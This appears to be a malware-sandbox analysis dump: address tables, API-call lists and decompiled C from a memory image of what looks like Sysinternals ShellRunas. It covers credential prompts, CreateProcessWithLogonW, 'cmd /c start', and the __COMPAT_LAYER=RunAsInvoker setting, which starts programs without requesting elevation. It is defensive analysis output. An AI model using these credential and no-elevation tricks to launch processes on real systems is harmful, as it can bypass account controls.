                                                          0x00000000
                                                          0x0040281e
                                                          0x00402820
                                                          0x00402868
                                                          0x00402868
                                                          0x00402873
                                                          0x0040287a
                                                          0x00000000
                                                          0x0040287a
                                                          0x00402828
                                                          0x0040282d
                                                          0x00000000
                                                          0x0040282d
                                                          0x00402515
                                                          0x00402527
                                                          0x0040252c
                                                          0x0040252f
                                                          0x00402531
                                                          0x00000000
                                                          0x00000000
                                                          0x00402533
                                                          0x0040253d
                                                          0x00402543
                                                          0x00402545
                                                          0x0040283b
                                                          0x00402840
                                                          0x00402840
                                                          0x00402845
                                                          0x00000000
                                                          0x00000000
                                                          0x00402847
                                                          0x00402849
                                                          0x0040284b
                                                          0x0040284e
                                                          0x00000000
                                                          0x00000000
                                                          0x00402852
                                                          0x0040285e
                                                          0x00402864
                                                          0x00402866
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402866
                                                          0x00000000
                                                          0x00402840
                                                          0x00000000
                                                          0x00402545
                                                          0x004024fe
                                                          0x00000000
                                                          0x004024fe
                                                          0x00000000
                                                          0x00402414
                                                          0x004023d9
                                                          0x004023de
                                                          0x00000000
                                                          0x004023de
                                                          0x00402335
                                                          0x00402338
                                                          0x00402355
                                                          0x00402355
                                                          0x00402359
                                                          0x00402359
                                                          0x0040235f
                                                          0x00402364
                                                          0x00402367
                                                          0x00000000
                                                          0x00402367
                                                          0x0040233a
                                                          0x00402347
                                                          0x0040234c
                                                          0x0040234f
                                                          0x00402351
                                                          0x00402353
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402353
                                                          0x004022e4
                                                          0x004022e7
                                                          0x00402304
                                                          0x00402304
                                                          0x00402308
                                                          0x00402308
                                                          0x00402310
                                                          0x00402315
                                                          0x00402318
                                                          0x00000000
                                                          0x00402318
                                                          0x004022ed
                                                          0x004022f6
                                                          0x004022fb
                                                          0x004022fe
                                                          0x00402300
                                                          0x00402302
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402302
                                                          0x00402293
                                                          0x00402296
                                                          0x004022b3
                                                          0x004022b3
                                                          0x004022b7
                                                          0x004022b7
                                                          0x004022bf
                                                          0x004022c4
                                                          0x004022c7
                                                          0x00000000
                                                          0x004022c7
                                                          0x004022a5
                                                          0x004022aa
                                                          0x004022ad
                                                          0x004022af
                                                          0x004022b1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004022b1
                                                          0x00402185
                                                          0x0040218c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040219f
                                                          0x004021a4
                                                          0x004021a9
                                                          0x004021b5
                                                          0x004021b5
                                                          0x004021b8
                                                          0x004021b8
                                                          0x004021c0
                                                          0x00000000
                                                          0x00000000
                                                          0x004021d2
                                                          0x004021ee
                                                          0x004021f6
                                                          0x004021fa
                                                          0x004021fe
                                                          0x00402202
                                                          0x0040220d
                                                          0x00402217
                                                          0x00402234
                                                          0x00402239
                                                          0x0040223c
                                                          0x0040226a
                                                          0x00402276
                                                          0x00402276
                                                          0x00000000

                                                          APIs
                                                          • _memset.LIBCMT ref: 00402091
                                                          • _memset.LIBCMT ref: 004020AF
                                                          • _memset.LIBCMT ref: 004020CD
                                                          • _memset.LIBCMT ref: 004020EB
                                                          • _memset.LIBCMT ref: 00402105
                                                            • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 00401819
                                                            • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 0040182E
                                                          • __wcsicmp.LIBCMT ref: 0040215D
                                                          • __wcsicmp.LIBCMT ref: 00402175
                                                          • __wcsicmp.LIBCMT ref: 0040219F
                                                            • Part of subcall function 0040346A: __wcsicmp_l.LIBCMT ref: 004034F0
                                                          • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,RunAsInvoker), ref: 004021B8
                                                          • _memset.LIBCMT ref: 004021D2
                                                          • _wcscpy_s.LIBCMT ref: 00402217
                                                          • _wcscat_s.LIBCMT ref: 00402234
                                                          • CreateProcessW.KERNEL32 ref: 00402262
                                                          • GetLastError.KERNEL32(?,?,?,?,00000208,cmd /c start ), ref: 00402270
                                                          • __wcsicmp.LIBCMT ref: 00402287
                                                          • __wcsicmp.LIBCMT ref: 004022A5
                                                          • __wcsicmp.LIBCMT ref: 004022D8
                                                          • __wcsicmp.LIBCMT ref: 004022F6
                                                          • __wcsicmp.LIBCMT ref: 00402329
                                                          • __wcsicmp.LIBCMT ref: 00402347
                                                          • __wcsicmp.LIBCMT ref: 00402378
                                                          • _wcscpy_s.LIBCMT ref: 004023B1
                                                          • _memset.LIBCMT ref: 00402423
                                                          • _memset.LIBCMT ref: 0040243A
                                                          • _memset.LIBCMT ref: 00402451
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000), ref: 004024EE
                                                          • GetLastError.KERNEL32 ref: 004024F8
                                                            • Part of subcall function 00403926: __wcslwr_s_l.LIBCMT ref: 00403930
                                                          • EnumWindows.USER32(00402000,?), ref: 0040253D
                                                          • Sleep.KERNEL32(0000000A), ref: 00402852
                                                          • EnumWindows.USER32(00402000,00000000), ref: 0040285E
                                                          • CloseHandle.KERNEL32(?), ref: 00402873
                                                          • CloseHandle.KERNEL32(?), ref: 0040287A
                                                          • LoadIconW.USER32 ref: 004028B7
                                                          • LoadIconW.USER32(?,ICON), ref: 004028C3
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004028D2
                                                          • RegisterClassExW.USER32 ref: 004028F5
                                                          • CreateDialogParamW.USER32 ref: 00402908
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402921
                                                          • IsDialogMessageW.USER32 ref: 0040292D
                                                          • TranslateMessage.USER32(?), ref: 0040293C
                                                          • DispatchMessageW.USER32 ref: 00402947
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402958
                                                          • LocalFree.KERNEL32(?,?,AboutUsage,00000000,Function_00001D50,00000000,?,?,?,?,ICON), ref: 0040296B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: __wcsicmp$_memset$Message$CreateLoad$CloseDialogEnumErrorHandleIconLastProcessWindows_wcscpy_s$ClassCursorDispatchEnvironmentFreeLocalLogonParamRegisterSleepTranslateVariableWith__wcsicmp_l__wcslwr_s_l_wcscat_s
                                                          • String ID: /netonly$/quiet$/raw$/reg$/regnetonly$/unreg$0$AboutUsage$D$D$Error launching application$Error launching program$ICON$RunAsInvoker$SHELLRUNAS$W$__COMPAT_LAYER$cmd /c start $cmd.exe
                                                          • API String ID: 417924082-754762936
                                                          • Opcode ID: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                                          • Instruction ID: b9bcd2630ba5b8b6581695927ee2c04d685a99353c32d213ca7add1f89437002
                                                          • Opcode Fuzzy Hash: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                                          • Instruction Fuzzy Hash: 81228F71508300AFD728DB29C949B9BB7E8AB84305F04883EF598762D1D7BD9944CF6B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 317 402cb0-402d93 call 40b320 call 409280 * 2 call 4036e5 call 40366b 328 402d95 317->328 329 402d9d-402dc1 LoadLibraryW GetProcAddress 317->329 328->329 330 402dc7-402ded 329->330 331 402e49-402ebc LoadLibraryW GetProcAddress 329->331 334 402df3-402e38 LoadLibraryW GetProcAddress 330->334 335 402f16-402f1c 330->335 331->335 336 402ebe-402ecf call 403939 331->336 345 402ef4-402ef7 334->345 346 402e3e-402e44 GetLastError 334->346 337 402f3b-402f54 call 40318a 335->337 338 402f1e-402f24 335->338 336->345 349 402ed1-402eee call 4036e5 GetComputerNameW 336->349 341 402f34-402f35 CoTaskMemFree 338->341 342 402f26-402f2e 338->342 341->337 342->342 347 402f30 342->347 345->335 350 402ef9-402f0e CredUIParseUserNameW 345->350 351 402f14 346->351 347->341 349->345 350->351 351->335
                                                          C-Code - Quality: 52%
                                                          			E00402CB0(void* __ecx, WCHAR* __edi, void* __eflags, void* __fp0, char _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, char _a24, char _a28, intOrPtr _a32, char _a36, char _a40, intOrPtr _a44, char _a48, char _a56, WCHAR* _a60, char* _a64, WCHAR* _a68, WCHAR* _a72, char _a76, char _a78, char _a1104, char _a1106, signed int _a66600, signed int _a66640, intOrPtr _a66648, intOrPtr _a66652, intOrPtr _a66656, intOrPtr _a66660) {
                                                          				char _v0;
                                                          				char _v20;
                                                          				char _v24;
                                                          				char _v28;
                                                          				long _v32;
                                                          				intOrPtr _v36;
                                                          				char* _v40;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t69;
                                                          				_Unknown_base(*)()* _t79;
                                                          				_Unknown_base(*)()* _t81;
                                                          				long _t82;
                                                          				char* _t83;
                                                          				void* _t87;
                                                          				long _t88;
                                                          				long _t92;
                                                          				_Unknown_base(*)()* _t94;
                                                          				intOrPtr _t106;
                                                          				WCHAR* _t124;
                                                          				void* _t125;
                                                          				intOrPtr _t127;
                                                          				signed int _t128;
                                                          				signed int _t129;
                                                          
                                                          				_t124 = __edi;
                                                          				E0040B320(0x10454);
                                                          				_t69 =  *0x413004; // 0xf284055d
                                                          				_a66640 = _t69 ^ _t128;
                                                          				_t127 = _a66656;
                                                          				_t125 = __ecx;
                                                          				_a20 = _a66652;
                                                          				_a12 = 0x100;
                                                          				_a8 = 0x151;
                                                          				_a1104 = 0;
                                                          				E00409280(__edi,  &_a1106, 0, 0xfffe);
                                                          				_a76 = 0;
                                                          				E00409280(_t124,  &_a78, 0, 0x402);
                                                          				_a32 = 0;
                                                          				_a36 = 0;
                                                          				_a40 = 0;
                                                          				_a44 = 0;
                                                          				_a28 = 0;
                                                          				_a24 = 0;
                                                          				_v0 = 0;
                                                          				_a4 = 0;
                                                          				_a48 = 0;
                                                          				_a16 = 0x201;
                                                          				E004036E5( &_a1104, 0x8000, L"Please enter credentials to use for ");
                                                          				E0040366B( &_a1104, 0x8000, _t125);
                                                          				_t129 = _t128 + 0x30;
                                                          				_a28 = 0x14;
                                                          				_a40 = L"Sysinternals Run as Different User (Netonly)";
                                                          				if(_a66648 == 0) {
                                                          					_a40 = L"Sysinternals Run as Different User";
                                                          				}
                                                          				_a36 =  &_a1104;
                                                          				_t79 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForWindowsCredentialsW");
                                                          				if(_t79 == 0) {
                                                          					 *_t124 = 0;
                                                          					_t81 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUIPromptForCredentialsW");
                                                          					_a56 = 0;
                                                          					_a64 = 0;
                                                          					_a68 = 0;
                                                          					_a60 = 0;
                                                          					_a72 = 0;
                                                          					_a64 =  &_a1104;
                                                          					_t119 =  &_a56;
                                                          					_a56 = 0x14;
                                                          					_a68 = L"ShellRunas - Sysinternals: www.sysinternals.com";
                                                          					_t82 =  *_t81( &_a56, _t125, 0, 0,  &_a76, _a16, _t127, _a12,  &_a48, 0x40082);
                                                          					_t126 = _t82;
                                                          					if(_t82 != 0) {
                                                          						goto L12;
                                                          					}
                                                          					_t87 = E00403939( &_a36, 0x5c);
                                                          					_t129 = _t129 + 8;
                                                          					if(_t87 == 0) {
                                                          						_t119 = _v20;
                                                          						E004036E5(_v20, 0x201,  &_a36);
                                                          						_t129 = _t129 + 0xc;
                                                          						GetComputerNameW(_t124,  &_v32);
                                                          					}
                                                          					goto L9;
                                                          				} else {
                                                          					_t119 = _a66660;
                                                          					_t92 =  *_t79( &_a28, _a66660,  &_a24, 0, 0,  &_v0,  &_a4, 0, 0);
                                                          					_t126 = _t92;
                                                          					if(_t92 != 0) {
                                                          						L12:
                                                          						_t83 = _v40;
                                                          						if(_t83 == 0) {
                                                          							L17:
                                                          							return E0040318A(_t126, 0, _a66600 ^ _t129, _t119, _t124, _t126);
                                                          						}
                                                          						_t106 = _v36;
                                                          						if(_t106 == 0) {
                                                          							L16:
                                                          							__imp__CoTaskMemFree(_t83);
                                                          							goto L17;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          						do {
                                                          							L14:
                                                          							 *_t83 = 0;
                                                          							_t83 = _t83 + 1;
                                                          							_t106 = _t106 - 1;
                                                          						} while (_t106 != 0);
                                                          						_t83 = _v40;
                                                          						goto L16;
                                                          					}
                                                          					_a16 = _v28;
                                                          					_t94 = GetProcAddress(LoadLibraryW(L"Credui.dll"), "CredUnPackAuthenticationBufferW");
                                                          					_push( &_v24);
                                                          					_push(_t127);
                                                          					_push( &_a16);
                                                          					_push(_t124);
                                                          					_push( &_v20);
                                                          					_push( &_a40);
                                                          					_t119 = _v36;
                                                          					_push(_v32);
                                                          					_push(_v36);
                                                          					_push(1);
                                                          					if( *_t94() != 0) {
                                                          						L9:
                                                          						if( *_t124 != 0) {
                                                          							goto L12;
                                                          						}
                                                          						_t119 = _v20;
                                                          						_t88 =  &_a36;
                                                          						__imp__CredUIParseUserNameW(_t88, _v20, 0x201, _t124, _v32);
                                                          						L11:
                                                          						_t126 = _t88;
                                                          						goto L12;
                                                          					}
                                                          					_t88 = GetLastError();
                                                          					goto L11;
                                                          				}
                                                          			}




























                                                          0x00402cb0
                                                          0x00402cb5
                                                          0x00402cba
                                                          0x00402cc1
                                                          0x00402cd1
                                                          0x00402ce0
                                                          0x00402ceb
                                                          0x00402cef
                                                          0x00402cf7
                                                          0x00402cff
                                                          0x00402d07
                                                          0x00402d17
                                                          0x00402d1c
                                                          0x00402d28
                                                          0x00402d2c
                                                          0x00402d30
                                                          0x00402d34
                                                          0x00402d45
                                                          0x00402d49
                                                          0x00402d4d
                                                          0x00402d51
                                                          0x00402d55
                                                          0x00402d59
                                                          0x00402d61
                                                          0x00402d74
                                                          0x00402d79
                                                          0x00402d83
                                                          0x00402d8b
                                                          0x00402d93
                                                          0x00402d95
                                                          0x00402d95
                                                          0x00402dae
                                                          0x00402db9
                                                          0x00402dc1
                                                          0x00402e53
                                                          0x00402e5d
                                                          0x00402e6a
                                                          0x00402e6e
                                                          0x00402e72
                                                          0x00402e76
                                                          0x00402e7a
                                                          0x00402e85
                                                          0x00402ea1
                                                          0x00402ea6
                                                          0x00402eae
                                                          0x00402eb6
                                                          0x00402eb8
                                                          0x00402ebc
                                                          0x00000000
                                                          0x00000000
                                                          0x00402ec5
                                                          0x00402eca
                                                          0x00402ecf
                                                          0x00402ed1
                                                          0x00402ee0
                                                          0x00402ee5
                                                          0x00402eee
                                                          0x00402eee
                                                          0x00000000
                                                          0x00402dc7
                                                          0x00402dd3
                                                          0x00402de7
                                                          0x00402de9
                                                          0x00402ded
                                                          0x00402f16
                                                          0x00402f16
                                                          0x00402f1c
                                                          0x00402f3b
                                                          0x00402f54
                                                          0x00402f54
                                                          0x00402f1e
                                                          0x00402f24
                                                          0x00402f34
                                                          0x00402f35
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402f26
                                                          0x00402f26
                                                          0x00402f26
                                                          0x00402f28
                                                          0x00402f2b
                                                          0x00402f2b
                                                          0x00402f30
                                                          0x00000000
                                                          0x00402f30
                                                          0x00402e01
                                                          0x00402e0c
                                                          0x00402e16
                                                          0x00402e17
                                                          0x00402e1c
                                                          0x00402e1d
                                                          0x00402e22
                                                          0x00402e2b
                                                          0x00402e2c
                                                          0x00402e30
                                                          0x00402e31
                                                          0x00402e32
                                                          0x00402e38
                                                          0x00402ef4
                                                          0x00402ef7
                                                          0x00000000
                                                          0x00000000
                                                          0x00402efd
                                                          0x00402f09
                                                          0x00402f0e
                                                          0x00402f14
                                                          0x00402f14
                                                          0x00000000
                                                          0x00402f14
                                                          0x00402e3e
                                                          0x00000000
                                                          0x00402e3e

                                                          APIs
                                                          • _memset.LIBCMT ref: 00402D07
                                                          • _memset.LIBCMT ref: 00402D1C
                                                          • _wcscpy_s.LIBCMT ref: 00402D61
                                                          • _wcscat_s.LIBCMT ref: 00402D74
                                                          • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForWindowsCredentialsW), ref: 00402DB2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402DB9
                                                          • LoadLibraryW.KERNEL32(Credui.dll,CredUnPackAuthenticationBufferW), ref: 00402E05
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402E0C
                                                          • GetLastError.KERNEL32 ref: 00402E3E
                                                          • LoadLibraryW.KERNEL32(Credui.dll,CredUIPromptForCredentialsW), ref: 00402E56
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00402E5D
                                                          • _wcschr.LIBCMT ref: 00402EC5
                                                          • _wcscpy_s.LIBCMT ref: 00402EE0
                                                          • GetComputerNameW.KERNEL32 ref: 00402EEE
                                                          • CredUIParseUserNameW.CREDUI(?,?,00000201,?,?), ref: 00402F0E
                                                          • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 00402F35
                                                          Strings
                                                          • CredUnPackAuthenticationBufferW, xrefs: 00402DF7
                                                          • CredUIPromptForWindowsCredentialsW, xrefs: 00402D9D
                                                          • ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00402EAE
                                                          • Sysinternals Run as Different User (Netonly), xrefs: 00402D8B
                                                          • CredUIPromptForCredentialsW, xrefs: 00402E49
                                                          • Credui.dll, xrefs: 00402DA9, 00402DFC, 00402E4E
                                                          • Sysinternals Run as Different User, xrefs: 00402D95
                                                          • Please enter credentials to use for , xrefs: 00402D23
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_jsc.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$Name_memset_wcscpy_s$ComputerCredErrorFreeLastParseTaskUser_wcscat_s_wcschr
                                                          • String ID: CredUIPromptForCredentialsW$CredUIPromptForWindowsCredentialsW$CredUnPackAuthenticationBufferW$Credui.dll$Please enter credentials to use for $ShellRunas - Sysinternals: www.sysinternals.com$Sysinternals Run as Different User$Sysinternals Run as Different User (Netonly)
                                                          • API String ID: 3725605542-3868041870
                                                          • Opcode ID: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                                          • Instruction ID: a6c5cf5511b36f9deb478c5fb5984fdae67559a08a685e8c4f8a8008dfdfd372
                                                          • Opcode Fuzzy Hash: cb23a2282606d663bf4c3b277bbcac3a273acd568eebcb31d91e76a76b45ee14
                                                          • Instruction Fuzzy Hash: A97151B1508341AFD714DF94CD859ABBBF8BFC8744F00492EF285A3290E7B59948CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 47%
                                                          			E004029C0(WCHAR* __ecx, void* __eflags, void* __fp0, WCHAR* _a4) {
                                                          				signed int _v4;
                                                          				signed int _v8;
                                                          				char _v86;
                                                          				short _v88;
                                                          				char _v166;
                                                          				short _v168;
                                                          				char _v204;
                                                          				char _v220;
                                                          				char _v284;
                                                          				char _v300;
                                                          				WCHAR* _v768;
                                                          				WCHAR* _v772;
                                                          				WCHAR* _v780;
                                                          				char _v784;
                                                          				intOrPtr* _v788;
                                                          				char _v792;
                                                          				intOrPtr* _v796;
                                                          				WCHAR* _v800;
                                                          				char _v804;
                                                          				void* _v808;
                                                          				signed int _v812;
                                                          				char _v844;
                                                          				char _v852;
                                                          				intOrPtr _v856;
                                                          				char _v864;
                                                          				char _v872;
                                                          				char _v876;
                                                          				signed int _v884;
                                                          				intOrPtr* _v892;
                                                          				char* _v896;
                                                          				intOrPtr* _v908;
                                                          				char _v924;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t68;
                                                          				signed int _t72;
                                                          				intOrPtr* _t73;
                                                          				intOrPtr* _t74;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t76;
                                                          				intOrPtr* _t82;
                                                          				signed int _t87;
                                                          				intOrPtr* _t89;
                                                          				signed int _t91;
                                                          				intOrPtr* _t92;
                                                          				intOrPtr* _t94;
                                                          				intOrPtr* _t97;
                                                          				intOrPtr* _t99;
                                                          				signed int _t101;
                                                          				intOrPtr* _t102;
                                                          				signed int _t104;
                                                          				intOrPtr* _t105;
                                                          				intOrPtr* _t108;
                                                          				char* _t110;
                                                          				signed int _t112;
                                                          				WCHAR* _t115;
                                                          				WCHAR* _t118;
                                                          				intOrPtr _t121;
                                                          				intOrPtr _t122;
                                                          				intOrPtr _t123;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t130;
                                                          				intOrPtr _t139;
                                                          				WCHAR* _t146;
                                                          				signed int _t147;
                                                          				signed int _t148;
                                                          
                                                          				_t147 =  &_v808;
                                                          				_t68 =  *0x413004; // 0xf284055d
                                                          				_v4 = _t68 ^ _t147;
                                                          				_t146 = _a4;
                                                          				_t115 = __ecx;
                                                          				_v768 = __ecx;
                                                          				_v792 = 0x104;
                                                          				_v788 = 0;
                                                          				_v804 = 0;
                                                          				_v784 = 0;
                                                          				_v780 = 0;
                                                          				_v800 = 0;
                                                          				_v796 = 0;
                                                          				_v772 = 0;
                                                          				_v168 = 0;
                                                          				E00409280(0,  &_v166, 0, 0x4c);
                                                          				_v88 = 0;
                                                          				_t72 = E00409280(0,  &_v86, 0, 0x4c);
                                                          				_t148 = _t147 + 0x18;
                                                          				_t137 =  &_v800;
                                                          				__imp__SHGetMalloc( &_v800);
                                                          				_t145 = _t72;
                                                          				if(_t72 < 0) {
                                                          					L28:
                                                          					_t73 = _v788;
                                                          					if(_t73 != 0) {
                                                          						_t124 =  *_t73;
                                                          						_t137 =  *((intOrPtr*)(_t124 + 8));
                                                          						 *((intOrPtr*)( *((intOrPtr*)(_t124 + 8))))(_t73);
                                                          					}
                                                          					_t74 = _v808;
                                                          					if(_t74 != 0) {
                                                          						_t123 =  *_t74;
                                                          						_t137 =  *((intOrPtr*)(_t123 + 8));
                                                          						 *((intOrPtr*)( *((intOrPtr*)(_t123 + 8))))(_t74);
                                                          					}
                                                          					_t118 = _v800;
                                                          					if(_t118 != 0) {
                                                          						_t82 = _v804;
                                                          						_t137 =  *_t82;
                                                          						 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x14))))(_t82, _t118);
                                                          					}
                                                          					_t75 = _v792;
                                                          					if(_t75 != 0) {
                                                          						_t122 =  *_t75;
                                                          						_t137 =  *((intOrPtr*)(_t122 + 8));
                                                          						 *((intOrPtr*)( *((intOrPtr*)(_t122 + 8))))(_t75);
                                                          					}
                                                          					_t76 = _v804;
                                                          					if(_t76 != 0) {
                                                          						_t121 =  *_t76;
                                                          						_t137 =  *((intOrPtr*)(_t121 + 8));
                                                          						 *((intOrPtr*)( *((intOrPtr*)(_t121 + 8))))(_t76);
                                                          					}
                                                          					return E0040318A(_t145 & 0x0000ffff, _t115, _v8 ^ _t148, _t137, 0, _t145);
                                                          				}
                                                          				_t87 =  &_v792;
                                                          				__imp__SHGetDesktopFolder(_t87);
                                                          				_t145 = _t87;
                                                          				if(_t87 < 0) {
                                                          					goto L28;
                                                          				}
                                                          				_t137 = _v800;
                                                          				if(SearchPathW(0, _t115, L".exe", _v800, _t146,  &_v772) != 0) {
                                                          					_t89 = _v796;
                                                          					_t137 =  &_v804;
                                                          					_v784 = 0x1010000;
                                                          					_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t89 + 0xc))))(_t89, 0, 0, _t146, 0,  &_v804,  &_v784);
                                                          					_t145 = _t91;
                                                          					__eflags = _t145;
                                                          					if(_t145 < 0) {
                                                          						goto L28;
                                                          					}
                                                          					__eflags = _v812 & 0x00010000;
                                                          					if((_v812 & 0x00010000) != 0) {
                                                          						__imp__CoInitialize(0);
                                                          						_t145 = _t91;
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							goto L28;
                                                          						}
                                                          						__imp__CoCreateInstance(0x40d2fc, 0, 1,  &E0040D2CC,  &_v844);
                                                          						_t145 = _t91;
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							L27:
                                                          							__imp__CoUninitialize();
                                                          							goto L28;
                                                          						}
                                                          						_t92 = _v864;
                                                          						_t139 =  *_t92;
                                                          						_t137 =  *((intOrPtr*)(_t139 + 0x14));
                                                          						_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t139 + 0x14))))(_t92, _v856);
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							goto L27;
                                                          						}
                                                          						_t94 = _v872;
                                                          						_t137 =  &_v852;
                                                          						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_t94))))(_t94, 0x40d2dc,  &_v852);
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							goto L27;
                                                          						}
                                                          						_t97 = _v864;
                                                          						_t130 =  *_t97;
                                                          						_t137 =  *((intOrPtr*)(_t130 + 0x14));
                                                          						_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x14))))(_t97, _t115, 0);
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							goto L27;
                                                          						}
                                                          						_t99 = _v896;
                                                          						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99))))(_t99, 0x40d2ec,  &_v872);
                                                          						__eflags = _t101;
                                                          						if(_t101 < 0) {
                                                          							L25:
                                                          							_t102 = _v908;
                                                          							_t137 = _v896;
                                                          							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0xc))))(_t102, _t146, _v896,  &_v864, 0);
                                                          							L26:
                                                          							_t145 = _t104;
                                                          							goto L27;
                                                          						}
                                                          						_t105 = _v884;
                                                          						_t145 =  *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x18))))(_t105,  &_v876);
                                                          						__eflags = _t145;
                                                          						if(_t145 < 0) {
                                                          							L18:
                                                          							_t115 = 0;
                                                          							__eflags = 0;
                                                          							L19:
                                                          							_t108 = _v892;
                                                          							 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 8))))(_t108);
                                                          							__eflags = _t115;
                                                          							if(_t115 == 0) {
                                                          								goto L25;
                                                          							}
                                                          							_t137 = _v884;
                                                          							_t104 =  &_v204;
                                                          							_push(_t104);
                                                          							_push(0);
                                                          							_push( &_v284);
                                                          							_push(_v884);
                                                          							L00403172();
                                                          							__eflags = _t104;
                                                          							if(__eflags == 0) {
                                                          								_t110 =  &_v924;
                                                          								_push(_t110);
                                                          								_push(_t146);
                                                          								_push( &_v220);
                                                          								_t137 =  &_v300;
                                                          								_push( &_v300);
                                                          								L0040316C();
                                                          								__eflags = _t110 - 3;
                                                          								if(_t110 != 3) {
                                                          									_t145 = 0x80004023;
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          							if(__eflags > 0) {
                                                          								_t104 = _t104 & 0x0000ffff | 0x80070000;
                                                          							}
                                                          							goto L26;
                                                          						}
                                                          						__eflags = _v884 & 0x00001000;
                                                          						if((_v884 & 0x00001000) == 0) {
                                                          							goto L18;
                                                          						}
                                                          						_t115 = 1;
                                                          						goto L19;
                                                          					} else {
                                                          						_t145 = 0;
                                                          						goto L28;
                                                          					}
                                                          				} else {
                                                          					_t112 = GetLastError();
                                                          					if(_t112 > 0) {
                                                          						_t145 = _t112 & 0x0000ffff | 0x80070000;
                                                          					} else {
                                                          						_t145 = _t112;
                                                          					}
                                                          					goto L28;
                                                          				}
                                                          			}







































































                                                          0x004029c0
                                                          0x004029c6
                                                          0x004029cd
                                                          0x004029d6
                                                          0x004029ea
                                                          0x004029ee
                                                          0x004029f2
                                                          0x004029fa
                                                          0x004029fe
                                                          0x00402a02
                                                          0x00402a06
                                                          0x00402a0a
                                                          0x00402a0e
                                                          0x00402a12
                                                          0x00402a16
                                                          0x00402a1e
                                                          0x00402a2e
                                                          0x00402a36
                                                          0x00402a3b
                                                          0x00402a3e
                                                          0x00402a43
                                                          0x00402a49
                                                          0x00402a4d
                                                          0x00402c33
                                                          0x00402c33
                                                          0x00402c39
                                                          0x00402c3b
                                                          0x00402c3d
                                                          0x00402c41
                                                          0x00402c41
                                                          0x00402c43
                                                          0x00402c49
                                                          0x00402c4b
                                                          0x00402c4d
                                                          0x00402c51
                                                          0x00402c51
                                                          0x00402c53
                                                          0x00402c59
                                                          0x00402c5b
                                                          0x00402c5f
                                                          0x00402c66
                                                          0x00402c66
                                                          0x00402c68
                                                          0x00402c6e
                                                          0x00402c70
                                                          0x00402c72
                                                          0x00402c76
                                                          0x00402c76
                                                          0x00402c78
                                                          0x00402c7e
                                                          0x00402c80
                                                          0x00402c82
                                                          0x00402c86
                                                          0x00402c86
                                                          0x00402ca7
                                                          0x00402ca7
                                                          0x00402a53
                                                          0x00402a58
                                                          0x00402a5e
                                                          0x00402a62
                                                          0x00000000
                                                          0x00000000
                                                          0x00402a68
                                                          0x00402a82
                                                          0x00402aa6
                                                          0x00402aaf
                                                          0x00402ab7
                                                          0x00402ac6
                                                          0x00402ac8
                                                          0x00402aca
                                                          0x00402acc
                                                          0x00000000
                                                          0x00000000
                                                          0x00402ad2
                                                          0x00402ada
                                                          0x00402ae4
                                                          0x00402aea
                                                          0x00402aec
                                                          0x00402aee
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b06
                                                          0x00402b0c
                                                          0x00402b0e
                                                          0x00402b10
                                                          0x00402c2d
